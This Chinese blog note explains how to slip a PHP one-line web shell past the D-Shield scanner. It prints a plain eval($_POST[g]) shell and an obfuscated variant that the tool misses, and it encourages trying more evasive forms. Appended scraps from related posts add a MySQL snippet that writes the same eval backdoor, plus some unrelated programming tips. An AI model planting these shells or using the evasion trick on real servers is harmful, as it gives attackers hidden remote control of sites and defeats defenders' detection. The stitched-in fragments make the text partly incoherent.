繞過D盾的一句話

2021-08-21 20:18:57 字數 639 閱讀 2221

乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。

新建test1.php

<?php 

eval($_post[g]);

?>

新建test2.php

<?php 

$a="$_post[g]";

eval($a=$a);

?>

使用d盾_web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。

那麼問題就出現在eval($a=$a)這樣的形式,eval()很容易就被查殺出來,但對於這樣一種形式就無法查殺。

可以預見基於特徵的**查殺,在一定程度上能夠檢測出一些問題,但是對於一些特殊形式的變形,還是無法查殺。

php是一門很靈活的語言,可以通過它的特性,去嘗試更多的函式形式,達到繞過的效果。

最後

繞過D盾的一句話

乙個很簡單的乙個技巧,作個筆記,可以繞過d盾檢測。新建test1.php eval post g 新建test2.php a post g eval a a 使用d盾 web查殺 v2.0.9 進行查殺,test1.php可以查殺出來,但是test2.php無法查殺。那麼問題就出現在eval a a...

mysql 匯出一句話 MySQL 匯出一句話

drop table if exists temp 如果存在temp就刪掉 create table temp cmd text not null 建立temp表,裡面就乙個cmd欄位 insert into temp cmd values php eval post cmd 把一句話木馬插入到te...

一句話提醒

1 在c 中,父窗體要訪問子窗體變數,需將子窗體變數設為public才能訪問。2 每 5 秒重新整理頁面 5 秒後重定向頁面 3 block 此元素將顯示為塊級元素,此元素前後會帶有換行符。inline 預設。此元素會被顯示為內聯元素,元素前後沒有換行符。4 document.getelementb...